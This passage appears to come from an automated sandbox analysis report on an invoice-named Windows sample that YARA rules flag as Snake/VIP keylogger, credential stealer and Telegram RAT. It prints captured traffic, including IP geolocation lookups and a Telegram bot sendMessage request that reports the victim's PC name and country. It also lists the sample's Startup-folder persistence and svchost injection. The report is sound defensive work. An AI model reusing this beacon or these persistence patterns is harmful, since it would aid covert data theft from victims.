                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:31 UTC851INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:31 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207280
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W3jBwyLSreYBcslOpLYRqP3oYOlHUBTaVtRma5V9ILn6NPddACtfqVu9kJVQwV3PVKO8SgQ0OkOYVHNmcKwQsQkYTs4yZfoZrihhUuYB2T%2Bw7ToGaWYmVD7GohyUq8yPoDmQglt"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc19369c800c354-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1479&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1923583&cwnd=178&unsent_bytes=0&cid=5b1ba5bf1e3dc9b6&ts=144&x=0"
                                                                                                              2025-01-03 08:21:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.749874188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:33 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:33 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207282
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNtEtNIm7hjVWAUxeZ4Td0Yqpt%2FCm1ZGZbFC7lkk2m5MSbyAnr2CETkbEpA5oEdDQHHjwE49AknHqAAWNiLfd2lUb4ok4TM4wuW4nPmK%2B%2FJ4LKAISVEJTIhzzjiZ2awWdN2Mc%2F11"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc19371fc2f6a58-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1657&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1699650&cwnd=235&unsent_bytes=0&cid=2c6bc9e3e608b1da&ts=155&x=0"
                                                                                                              2025-01-03 08:21:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.749884188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:34 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:34 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207283
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOWlOHKC8Il6J%2Bzqns3%2FAow5YYD8Dr5sL0aBuizuy0TmVOwub6yHwMtkMJXHKJaOIAu0xXx3qmHUseI3GcduUhnFVyvbMjztCZs7NPAtAsUeSyxSf%2FbmIS5PGQtxC3JZuC4Zn2%2Bj"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc1937a1f030f98-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1456&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1863433&cwnd=182&unsent_bytes=0&cid=54511f4f798edcfe&ts=149&x=0"
                                                                                                              2025-01-03 08:21:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.749893188.114.96.34437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:35 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:35 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207284
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vj%2F9Rf%2B5x4FkwEeOPRQfc%2Bj%2B4W1A7Jid8scQHERZiAjdU7F9TgZmoJ4UFNbnAKHM%2BzDpQEfi25sX3ehujLr4yrp6J4ZUn8sUKebOtRui8BDoLU4u%2FQSCuVeB5rfSg3iQIsAd3YLZ"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc193824b4741d8-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1702&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1676234&cwnd=222&unsent_bytes=0&cid=d5ad46cb559e599e&ts=157&x=0"
                                                                                                              2025-01-03 08:21:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.749899149.154.167.2204437588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:36 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 03 Jan 2025 08:21:36 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-03 08:21:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:3
                                                                                                              Start time:03:21:05
                                                                                                              Start date:03/01/2025
                                                                                                              Path:C:\Users\user\Desktop\FACT0987789000900.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\FACT0987789000900.exe"
                                                                                                              Imagebase:0x490000
                                                                                                              File size:641'024 bytes
                                                                                                              MD5 hash:E4DA22458C317595E4BD6712B4728D36
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:03:21:06
                                                                                                              Start date:03/01/2025
                                                                                                              Path:C:\Users\user\AppData\Local\thixolabile\juvenile.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\FACT0987789000900.exe"
                                                                                                              Imagebase:0x8d0000
                                                                                                              File size:641'024 bytes
                                                                                                              MD5 hash:E4DA22458C317595E4BD6712B4728D36
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 71%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:03:21:09
                                                                                                              Start date:03/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\FACT0987789000900.exe"
                                                                                                              Imagebase:0x6f0000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:9
                                                                                                              Start time:03:21:19
                                                                                                              Start date:03/01/2025
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
                                                                                                              Imagebase:0x7ff662190000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:03:21:20
                                                                                                              Start date:03/01/2025
                                                                                                              Path:C:\Users\user\AppData\Local\thixolabile\juvenile.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
                                                                                                              Imagebase:0x8d0000
                                                                                                              File size:641'024 bytes
                                                                                                              MD5 hash:E4DA22458C317595E4BD6712B4728D36
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:11
                                                                                                              Start time:03:21:21
                                                                                                              Start date:03/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
                                                                                                              Imagebase:0x6f0000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
